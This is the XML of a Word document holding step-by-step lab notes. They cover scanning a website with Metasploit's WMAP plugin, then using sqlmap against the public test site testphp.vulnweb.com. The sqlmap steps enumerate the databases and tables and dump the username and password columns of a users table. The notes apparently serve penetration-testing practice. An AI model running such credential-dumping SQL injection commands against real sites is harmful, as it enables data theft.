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75" w:rsidRDefault="00D64975"/>
    <w:p w:rsidR="00357699" w:rsidRPr="004E6562" w:rsidRDefault="00AC5E3D" w:rsidP="004E6562">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E6562">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Website scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5E3D" w:rsidRDefault="00AC5E3D"/>
    <w:p w:rsidR="00AC5E3D" w:rsidRDefault="00AC5E3D"/>
    <w:p w:rsidR="00AC5E3D" w:rsidRDefault="00AC5E3D">
      <w:r>
        <w:t xml:space="preserve">Step-1 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5E3D" w:rsidRDefault="00AC5E3D">
      <w:r>
        <w:t>msfdb init</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC5E3D" w:rsidRDefault="00AC5E3D"/>
    <w:p w:rsidR="00B63C88" w:rsidRDefault="00B63C88">
      <w:r>
        <w:t>step 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63C88" w:rsidRDefault="00B63C88">
      <w:r>
        <w:t>service postgresql start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63C88" w:rsidRDefault="00B63C88">
      <w:r>
        <w:t xml:space="preserve">step 3 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63C88" w:rsidRDefault="00B63C88">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D04EB" w:rsidRDefault="00042801">
      <w:r>
        <w:t xml:space="preserve">step 4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B63C88" w:rsidRDefault="00042801">
      <w:r>
        <w:t>db_status</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>step 5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>load wmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>step 6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t xml:space="preserve">Wmap_sites –a  </w:t>
      </w:r>
      <w:hyperlink r:id="rId4" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://vulweb.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap_sites –l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Step 9</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap_target</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t xml:space="preserve">Wmap_targets –t  </w:t>
      </w:r>
      <w:r w:rsidR="004E6562">
        <w:t>http://&lt;ipAddress&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap_targets –l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 12</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap _run</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 13</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap_run –t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 14</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Info  auxiliary/scannerhttp/http_version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Step 15</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801">
      <w:r>
        <w:t>Wmap_run –e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="00042801"/>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00042801" w:rsidRDefault="0047685C">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Website exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="009C0147">
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidR="0089638B" w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://www.vulnweb.com/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0089638B" w:rsidRDefault="0089638B"/>
    <w:p w:rsidR="0089638B" w:rsidRDefault="0089638B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="315410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8B" w:rsidRDefault="0089638B"/>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C">
      <w:r>
        <w:t>Step 1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="00BD5A3D" w:rsidP="0047685C">
      <w:r>
        <w:t>msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00BD5A3D">
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5A3D" w:rsidRDefault="00BD5A3D" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Sqlmap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00BD5A3D">
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5A3D" w:rsidRDefault="00BD5A3D" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId7" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  --dbs</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="00BD5A3D">
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5A3D" w:rsidRDefault="00BD5A3D" w:rsidP="00BD5A3D">
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -D acuart --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BD5A3D" w:rsidRDefault="00BD5A3D" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="004E08AE">
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E08AE" w:rsidRDefault="004E08AE" w:rsidP="0047685C"/>
    <w:p w:rsidR="004E08AE" w:rsidRDefault="004E08AE" w:rsidP="004E08AE">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -D acuart --tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E08AE" w:rsidRDefault="004E08AE" w:rsidP="0047685C"/>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="004E08AE">
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E08AE" w:rsidRDefault="004E08AE" w:rsidP="004E08AE">
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -D acuart –T users --columns</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E08AE" w:rsidRDefault="004E08AE" w:rsidP="0047685C"/>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="005E67AA">
        <w:t>7</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E67AA" w:rsidRDefault="005E67AA" w:rsidP="005E67AA">
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId11" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -D acuart –T users  -C uname –dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E67AA" w:rsidRDefault="005E67AA" w:rsidP="005E67AA"/>
    <w:p w:rsidR="005E67AA" w:rsidRDefault="005E67AA" w:rsidP="0047685C"/>
    <w:p w:rsidR="0047685C" w:rsidRDefault="0047685C" w:rsidP="0047685C">
      <w:r>
        <w:t xml:space="preserve">Step </w:t>
      </w:r>
      <w:r w:rsidR="005E67AA">
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E67AA" w:rsidRDefault="005E67AA" w:rsidP="005E67AA">
      <w:r>
        <w:t xml:space="preserve">Sqlmap –u  </w:t>
      </w:r>
      <w:hyperlink r:id="rId12" w:history="1">
        <w:r w:rsidRPr="002335E9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://testphp.vulnweb.com/artists.php?artist=1</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve">  -D acuart –T users  -C pass –dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E67AA" w:rsidRDefault="005E67AA" w:rsidP="0047685C"/>
    <w:sectPr w:rsidR="005E67AA" w:rsidSect="00CC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497E7E"/>
    <w:rsid w:val="00001056"/>
    <w:rsid w:val="00042801"/>
    <w:rsid w:val="00190D34"/>
    <w:rsid w:val="00357699"/>
    <w:rsid w:val="00410C79"/>
    <w:rsid w:val="00413C15"/>
    <w:rsid w:val="0047685C"/>
    <w:rsid w:val="00497E7E"/>
    <w:rsid w:val="004E08AE"/>
    <w:rsid w:val="004E6562"/>
    <w:rsid w:val="0051328B"/>
    <w:rsid w:val="005C7345"/>
    <w:rsid w:val="005E67AA"/>
    <w:rsid w:val="005F20B6"/>
    <w:rsid w:val="00672E83"/>
    <w:rsid w:val="007A58C3"/>
    <w:rsid w:val="0089638B"/>
    <w:rsid w:val="008F6185"/>
    <w:rsid w:val="00953D2F"/>
    <w:rsid w:val="009659CE"/>
    <w:rsid w:val="0097485D"/>
    <w:rsid w:val="009C0147"/>
    <w:rsid w:val="009D04EB"/>
    <w:rsid w:val="00A15725"/>
    <w:rsid w:val="00AC5E3D"/>
    <w:rsid w:val="00B63C88"/>
    <w:rsid w:val="00B82C61"/>
    <w:rsid w:val="00BB0AB6"/>
    <w:rsid w:val="00BD5A3D"/>
    <w:rsid w:val="00C12484"/>
    <w:rsid w:val="00C14154"/>
    <w:rsid w:val="00C312C6"/>
    <w:rsid w:val="00CC5B4B"/>
    <w:rsid w:val="00CC77B7"/>
    <w:rsid w:val="00CF3E2A"/>
    <w:rsid w:val="00D64975"/>
    <w:rsid w:val="00D75A94"/>
    <w:rsid w:val="00E26193"/>
    <w:rsid w:val="00E61BD7"/>
    <w:rsid w:val="00EF01D3"/>
    <w:rsid w:val="00F14A57"/>
    <w:rsid w:val="00F45F68"/>
    <w:rsid w:val="00F50749"/>
    <w:rsid w:val="00F74F95"/>
    <w:rsid w:val="00F9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8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/artists.php?artist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php.vulnweb.com/artists.php?artist=1" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist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estphp.vulnweb.com/artists.php?artist=1" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.vulnweb.com/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist=1" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://vulweb.com" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://testphp.vulnweb.com/artists.php?artist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14</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2019-01-12T05:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-01-19T02:21:00Z</dcterms:modified>
</cp:coreProperties>
</file>